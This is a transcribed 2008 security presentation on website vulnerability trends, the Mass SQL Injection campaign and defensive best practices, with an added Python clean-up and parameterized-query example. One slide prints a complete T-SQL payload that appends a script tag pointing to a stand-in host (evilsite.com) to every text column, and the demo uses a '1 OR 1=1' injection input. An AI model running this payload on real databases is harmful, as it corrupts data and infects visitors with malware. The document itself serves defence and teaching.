Top Website Vulnerabilities: "Trends, Effects on Governmental Cyber Security, How to Fight Them."
Jeremiah Grossman, WhiteHat Security founder & CTO
© 2008 WhiteHat Security, Inc.

Jeremiah Grossman, WhiteHat Security Founder & CTO
• Technology R&D and industry evangelist (InfoWorld's CTO Top 25 for 2007)
• Frequent international conference speaker
• Co-founder of the Web Application Security Consortium
• Co-author: Cross-Site Scripting Attacks
• Former Yahoo! information security officer

Official title: "the hacker yahoo". Job description: Hack Everything!
Protect this website and the ~599 others. Find the vulnerabilities before the bad guys.

WhiteHat Sentinel
• Unlimited Assessments – customer controlled and expert managed – the ability to scan websites no matter how big or how often they change
• Coverage – authenticated scans to identify technical vulnerabilities and custom testing to uncover business logic flaws
• Virtually Eliminate False Positives – Operations Team verifies results and assigns the appropriate severity and threat rating
• Development and QA – WhiteHat Satellite Appliance allows us to service intranet-accessible systems remotely
• Improvement & Refinement – real-world scans enable fast and efficient updates

Custom Web Applications, Custom Vulnerabilities
Vulnerability Stack (diagram): WhiteHat Security above the "well-known" vulnerabilities covered by Symantec, Qualys, Nessus, nCircle.
Data is unique from reports distributed by Symantec, Mitre (CVE), IBM (ISS) X-Force, SANS, and others. These organizations track publicly disclosed vulnerabilities in commercial and open source software products, which may contain Web application flaws as well. WhiteHat Security's data is different because it focuses solely on previously unknown vulnerabilities in custom web applications, code unique to that organization, on real-world websites.

168,000,000 websites, millions more added per month.
809,000 websites use SSL, protecting passwords, credit card numbers, social security numbers, and our email (if we're lucky).
9 out of 10 websites have vulnerabilities allowing hackers unauthorized access.
(image: "hacked")
Over 79% of websites hosting malicious code are legitimate (compromised by attackers). A new infected Web page is discovered every 5 seconds, 24 hours a day, 365 days a year.

WhiteHat Security: Top 10 (chart) – Likelihood that a website has a vulnerability, by class

But how bad is it really? (chart) – Likelihood that a website has a vulnerability, by severity. Websites with Urgent, Critical, or High severity issues technically would not pass PCI compliance.

Another way to look at the badness (chart) – Percentage of vulnerabilities ranked by severity

Overall vulnerability population (chart)

Technology Breakdown (chart) – file extensions

Industry Verticals (chart) – Percentage of websites with either URGENT, CRITICAL or HIGH severity vulnerabilities, ranked by industry

Worst of the Worst (chart) – Percentage of vulnerability classes in overall population, ranked by industry

Data input correlation
• Average inputs per website: 154
• Ratio of vulnerability/inputs: 2.2%

Average Time to Fix in Days (chart; scale 180, 270, 365)

More major websites were launched before significant classes of attack were "well-known"

    Website            Founded    Vulnerability                    Attack
    Amazon             1994       Buffer Overflow                  1996
    Yahoo              1995       Command Injection                1996
    eBay               1995       SQL Injection                    2004
    Bank of America    1997       XSS                              2005
    Google             1998       Predictable Resource Location    ?
    MySpace            2003       HTTP Response Splitting          2005 / ?
    YouTube            2005       CSRF                             ?

If there's just 1 vulnerability on 90% of the SSL websites...
728,100 total vulnerabilities. Other reports say an average of 7.

XSSed.com has reported: 20,843 total vulnerabilities, 1,072 fixed (5%).

Mass SQL Injection
1. Google recon for weak websites (*.asp, *.php)
2. Generic SQL Injection populates databases with malicious JavaScript IFRAMEs.
3. Visitors arrive (U.N., DHS, etc.) and their browser auto-connects to a malware server, infecting their machine with trojans.
4. Botnets form, which then continue SQL injecting websites.

The injected payload (T-SQL):

    -- Enumerate every text-typed column of every user table (xtype 'u'),
    -- then append a script tag to every value in each of those columns.
    DECLARE @T varchar(255), @C varchar(255);
    DECLARE Table_Cursor CURSOR FOR
        SELECT a.name, b.name FROM sysobjects a, syscolumns b
        WHERE a.id = b.id AND a.xtype = 'u'
          AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167);  -- ntext, text, nvarchar, varchar
    OPEN Table_Cursor;
    FETCH NEXT FROM Table_Cursor INTO @T, @C;
    WHILE (@@FETCH_STATUS = 0)
    BEGIN
        -- convert(varchar, ...) without a length truncates to 30 characters, so the
        -- original data is damaged as well as tagged; clean-up cannot fully restore it.
        EXEC('update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))+ ''<script src=http://evilsite.com/1.js></script>''');
        FETCH NEXT FROM Table_Cursor INTO @T, @C;
    END;
    CLOSE Table_Cursor;
    DEALLOCATE Table_Cursor;

In 2006, 0.3% of all Internet queries returned at least one URL containing malicious content. 2007: 1.3%. 2008: ?

Best Practices
• Asset Tracking – Find your websites, assign a responsible party, and rate their importance to the business. Because you can't secure what you don't know you own.
• Measure Security – Perform rigorous and on-going vulnerability assessments, preferably every week. Because you can't secure what you can't measure.
• Development Frameworks – Provide programmers with software development tools enabling them to write code rapidly that also happens to be secure. Because you can't mandate secure code, only help it.
• Defense-in-Depth – Throw up as many roadblocks to attackers as possible. This includes custom error messages, Web application firewalls, security with obscurity, and so on. Because 9 in 10 websites are already insecure, no need to make it any easier.
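The following is an added example, not code from the presentation or from WhiteHat Security. It serves two of the slides above: the Mass SQL Injection sequence, for which it shows the defender's mirror image of the attacker's cursor loop (enumerate every text column of every user table, find the cells carrying an injected script tag and strip it), and the Development Frameworks best practice, for which it puts the root-cause pattern (user input concatenated into SQL text) next to the parameterized form a framework should make the default. sqlite3 stands in for the SQL Server database the T-SQL payload targets; the table names, column names and seeded rows are constructed for the demo.

```python
"""Added example: clean-up sweep for script tags injected into database text
columns, plus the vulnerable-vs-parameterized lookup that is the root cause.
sqlite3 stands in for SQL Server; all tables, columns and rows are constructed."""
import re
import sqlite3

# Same shape as the tag on the slide; here it is only seeded sample data.
INJECTED_TAG = "<script src=http://evilsite.com/1.js></script>"
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*\bsrc\s*=[^>]*>\s*</script>", re.IGNORECASE)

def build_sample_db():
    """In-memory database seeded with the post-compromise state (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT, price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, headline TEXT, body TEXT);
    """)
    conn.execute("INSERT INTO products VALUES (1, 'Widget', ?, 9.99)", ("A fine widget" + INJECTED_TAG,))
    conn.execute("INSERT INTO products VALUES (2, 'Gadget', ?, 19.99)", ("A fine gadget" + INJECTED_TAG,))
    conn.execute("INSERT INTO news VALUES (1, 'Site launched', ?)", ("Welcome to our site" + INJECTED_TAG,))
    conn.commit()
    return conn

def lookup_product_unsafe(conn, product_id):
    """Vulnerable pattern: the request parameter is pasted into the SQL text,
    so whatever the caller sends is parsed as SQL."""
    return [row[0] for row in conn.execute("SELECT name FROM products WHERE id = " + product_id)]

def lookup_product_safe(conn, product_id):
    """Parameterized form: the value travels separately from the statement and
    is only ever compared against id, never parsed as SQL."""
    return [row[0] for row in conn.execute("SELECT name FROM products WHERE id = ?", (product_id,))]

def qi(identifier):
    """Quote a table or column name taken from the database catalog. Identifiers
    cannot be bound as parameters, so this is the one place SQL text is assembled,
    and only from catalog names, never from request data."""
    return '"' + identifier.replace('"', '""') + '"'

def text_columns(conn):
    """(table, column) pairs of text-typed columns in user tables, read from
    sqlite's catalog; the slide's payload does the same via sysobjects/syscolumns."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    pairs = []
    for table in tables:
        for _cid, name, decl_type, *_ in conn.execute(f"PRAGMA table_info({qi(table)})"):
            if "CHAR" in decl_type.upper() or "TEXT" in decl_type.upper():
                pairs.append((table, name))
    return pairs

def find_injected(conn):
    """(table, column, rowid, value) for every cell that carries a script tag.
    A cheap LIKE pre-filter narrows the rows; the regex confirms the match."""
    hits = []
    for table, col in text_columns(conn):
        sql = f"SELECT rowid, {qi(col)} FROM {qi(table)} WHERE {qi(col)} LIKE ?"
        for rowid, value in conn.execute(sql, ("%<script%",)):
            if value is not None and SCRIPT_TAG_RE.search(value):
                hits.append((table, col, rowid, value))
    return hits

def strip_injected(conn):
    """Remove the injected tags in place; returns the number of cells cleaned.
    Values are bound as parameters, so a cell containing quotes or further SQL
    fragments cannot turn the clean-up itself into an injection."""
    cleaned = 0
    for table, col, rowid, value in find_injected(conn):
        sql = f"UPDATE {qi(table)} SET {qi(col)} = ? WHERE rowid = ?"
        conn.execute(sql, (SCRIPT_TAG_RE.sub("", value), rowid))
        cleaned += 1
    conn.commit()
    return cleaned

if __name__ == "__main__":
    db = build_sample_db()
    print("unsafe lookup, input '1 OR 1=1':", lookup_product_unsafe(db, "1 OR 1=1"))
    print("safe lookup,   input '1 OR 1=1':", lookup_product_safe(db, "1 OR 1=1"))
    for table, col, rowid, _ in find_injected(db):
        print(f"injected tag in {table}.{col} rowid={rowid}")
    print("cells cleaned:", strip_injected(db))
    print("remaining hits:", find_injected(db))
```

Running the script shows the unsafe lookup returning every product for the input `1 OR 1=1` while the parameterized lookup returns nothing, then three tagged cells found and cleaned. On SQL Server the same sweep would read table and column names from INFORMATION_SCHEMA.COLUMNS instead of sqlite_master; the rest of the approach, catalog-driven enumeration with bound values for everything that came from the data, is unchanged. Since the payload's convert(varchar, ...) truncates values to 30 characters, stripping the tag recovers only what survived; full restoration needs a pre-compromise backup.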
Thank You
For more information visit: www.whitehatsec.com/
Jeremiah Grossman, founder and CTO
blog: http://jeremiahgrossman.blogspot.com/
email: [email protected]